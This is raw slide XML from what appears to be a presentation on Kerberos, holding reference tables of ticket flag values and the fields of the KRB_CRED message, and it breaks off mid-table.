                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="424073">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>FORWARDABLE</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0x40000000</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(TGT only). Tells the ticket-granting service that it can issue a new TGT—based on the presented TGT—with a different network address based on the presented TGT.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="400103">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>FORWARDED</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0x20000000</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Indicates either that a TGT has been forwarded or that a ticket was issued from a forwarded TGT.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="424073">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PROXIABLE</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0x10000000</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(TGT only). Tells the ticket-granting service that it can issue tickets with a network address that differs from the one in the TGT.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="400103">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PROXY</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0x08000000</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Indicates that the network address in the ticket is different from the one in the TGT used to obtain the ticket.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="213351">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MAY-POSTDATE</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0x04000000</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(TGT only). Tells the ticket-granting service (TGS) that a postdated ticket can be issued.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="213351">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>POSTDATED</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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>0x02000000</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">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Indicates that the ticket has been postdated.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="424073">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>INVALID</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0x01000000</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Indicates that the ticket is invalid and must be validated by the KDC before use. A postdated ticket is flagged as invalid until its valid start time.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="424073">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>RENEWABLE</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0x00800000</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Used in combination with the End Time and Renew Till fields to cause tickets with long life spans to be renewed at the KDC periodically.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="400103">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>INITIAL</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0x00400000</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Indicates that a ticket was issued using the authentication service (AS) exchange and not issued based on a TGT.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="598913">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PRE-AUTHENT</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0x00200000</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Indicates that the client was authenticated by the KDC before a ticket was issued. This flag usually indicates the presence of an authenticator in the ticket. It can also flag the presence of credentials taken from a smart card logon.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10010"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="213351">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>HW-AUTHENT</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0x00100000</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Indicates that the initial authentication required the use of hardware.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10011"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="213351">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050">
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OK-AS-DELEGATE</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>0x00040000</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050">
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10012"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="213351">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>NAME-CANONICALIZE</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0x00010000</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1998" marR="1998" marT="1998" marB="0"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5504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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>KRB_CRED message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="コンテンツ プレースホルダー 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="360000" y="1260000"/>
          <a:ext cx="8379322" cy="4447388"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{6E25E649-3F16-4E02-A733-19D2CDBF48F0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1506900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6872422">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Field</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="7371" marR="7371" marT="7371" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike">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00"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Protocol Version</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altLang="ja-JP" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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01"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Message Type</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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>KRB_CRED</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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02"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="381051">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ticket</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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The encrypted ticket is placed here. For the KRB_TGS_REP message, this will be the service ticket encrypted with the target server's secret key.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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03"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Key</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This is the session key the client will use with the application server.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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04"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Principal Realm</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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) Name of the delegated principal's realm (domain).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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05"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Principal Name</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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) Delegated principal's name.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" dirty="0">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06"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Flags</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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) These are the flags set in the ticket.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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07"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Authentication Time</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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) The time the ticket was issued.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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08"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Start Time</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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) At what time the ticket is valid.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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09"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>End Time</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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) At what time the ticket expires (although it can be renewed if the ticket is renewable).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">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10"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="194624">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Renew Till</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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
